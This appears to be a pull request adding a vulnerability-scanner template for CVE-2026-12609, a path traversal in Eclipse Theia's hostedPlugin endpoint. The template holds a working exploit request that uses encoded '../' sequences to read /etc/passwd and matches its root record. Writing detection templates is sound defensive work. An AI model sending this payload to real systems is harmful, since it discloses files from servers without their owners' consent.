### PR TITLE
Add CVE-2026-12609 template

### DIFF
--- a/http/cves/2026/CVE-2026-12609.yaml
+++ b/http/cves/2026/CVE-2026-12609.yaml
@@ -1,0 +1,42 @@
+id: CVE-2026-12609
+
+info:
+  name: Eclipse Theia - Unauthenticated Path Traversal
+  author: str4k3r
+  severity: high
+  description: >
+    Eclipse Theia's plugin-ext backend exposes the hostedPlugin endpoint
+    without constraining the resolved path to the plugin directory. An
+    unauthenticated request using encoded traversal sequences can therefore
+    read files accessible to the backend process. The built-in vscode_bat
+    plugin identifier provides a deterministic anchor without target-specific
+    setup.
+  reference:
+    - https://github.com/eclipse-theia/theia/security/advisories/GHSA-qmm6-p8q4-2g48
+    - https://gitlab.eclipse.org/security/cve-assignment/-/work_items/133
+  classification:
+    cve-id: CVE-2026-12609
+    cwe-id: CWE-22
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: eclipse
+    product: theia
+    technology: nodejs, typescript
+  tags: cve,cve2026,eclipse,theia,lfi,traversal,unauth
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/hostedPlugin/vscode_bat/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"


### PR DESCRIPTION
## Verification

This template follows the public Eclipse Theia advisory and tests the
unauthenticated `/hostedPlugin` traversal with the deterministic `vscode_bat`
plugin anchor. It requires one read-only request and uses the standard
`/etc/passwd` root-record oracle; it does not create, modify, or execute
anything on the target.

The advisory documents the affected `@theia/plugin-ext` implementation, the
official `theia-ide` image reproduction, and the 1.74.0 fix:
https://github.com/eclipse-theia/theia/security/advisories/GHSA-qmm6-p8q4-2g48